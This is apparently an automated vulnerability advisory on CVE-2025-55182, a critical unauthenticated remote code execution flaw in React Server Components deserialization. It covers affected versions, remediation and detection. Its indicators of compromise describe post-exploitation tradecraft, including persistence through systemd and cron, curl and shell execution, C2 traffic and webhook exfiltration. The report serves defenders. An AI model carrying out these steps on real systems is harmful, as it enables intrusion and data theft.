Full Report
The availability of exploit code will likely lead to more widespread opportunistic attacks
Analysis Summary
# Vulnerability: React2Shell Remote Code Execution Flaw
## CVE Details
- CVE ID: CVE-2025-55182
- CVSS Score: **10.0 (Critical)**
- CWE: Insufficient Validation of Deserialized Data (Implied by behavior)
## Affected Systems
- Products: React Server Components (and frameworks relying on its deserialization logic, e.g., Next.js)
- Versions: 19.0.0, 19.1.0, 19.1.1, and 19.2.0
- Configurations: Server environments processing requests via the React "Flight" protocol.
## Vulnerability Description
The React2Shell vulnerability is a critical flaw residing in how React Server Components (RSC) deserialize data sent from the client browser via the React "Flight" protocol. The server performs insufficient validation when translating network requests into internal JavaScript objects. This allows an attacker to send a specially crafted, malformed HTTP request that is processed instead of rejected. Successful exploitation enables the attacker to interfere with the application's internal execution flow, leading to Remote Code Execution (RCE) with the privileges of the running application. The attack requires only network access to the vulnerable endpoint; no authentication is necessary.
## Exploitation
- Status: **Exploited in the wild** (Widespread exploitation observed)
- Complexity: **Low** (Attack carried out via a single malicious HTTP request)
- Attack Vector: **Network** (Remote, unauthenticated)
## Impact
- Confidentiality: **High** (Potential access to sensitive data)
- Integrity: **High** (Ability to alter application behavior)
- Availability: **High** (Potential for full server compromise)
## Remediation
### Patches
- The article implies patches are available following the disclosure on December 3, 2025, but specific version numbers for the *fixed* React Server Components are **not listed** in the provided text. Users must consult the official React release advisories for patched versions.
### Workarounds
- No direct workarounds are explicitly detailed, but immediate mitigation involves:
- Updating affected React Server Component packages to versions outside the vulnerable range.
- Implementing strict Web Application Firewall (WAF) rules or layer 7 ingress controls to inspect and potentially block malformed Flight protocol requests if immediate patching is impossible.
## Detection
- **Indicators of Compromise (IOCs):**
- Rapid deployment of Linux loaders and persistence mechanisms (systemd, cron, rc.local).
- Covert installation of Node.js and obfuscated JavaScript in hidden directories.
- Outbound network connections to public cloud infrastructure or multiple C2 servers.
- Use of Canarytoken URLs or webhooks for exfiltration/telemetry.
- Execution of suspicious shell commands (`/bin/sh`, `curl`) on Linux or PowerShell commands on Windows post-exploitation.
- **Detection Methods and Tools:**
- Monitoring endpoint activity for suspicious file creation or modification in hidden directories related to Node.js execution.
- Network monitoring for unusual outbound traffic patterns indicative of C2 communication or data exfiltration.
- Endpoint Detection and Response (EDR) tools configured to flag the execution of shell scripts downloaded and executed via web requests.
## References
- Vendor Advisory (React Disclosure): hXXps://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
- NVD Entry: hXXps://nvd.nist.gov/vuln/detail/CVE-2025-55182
- Research Identifying Scope: hXXps://infosec.exchange/@shadowserver/115690544827801847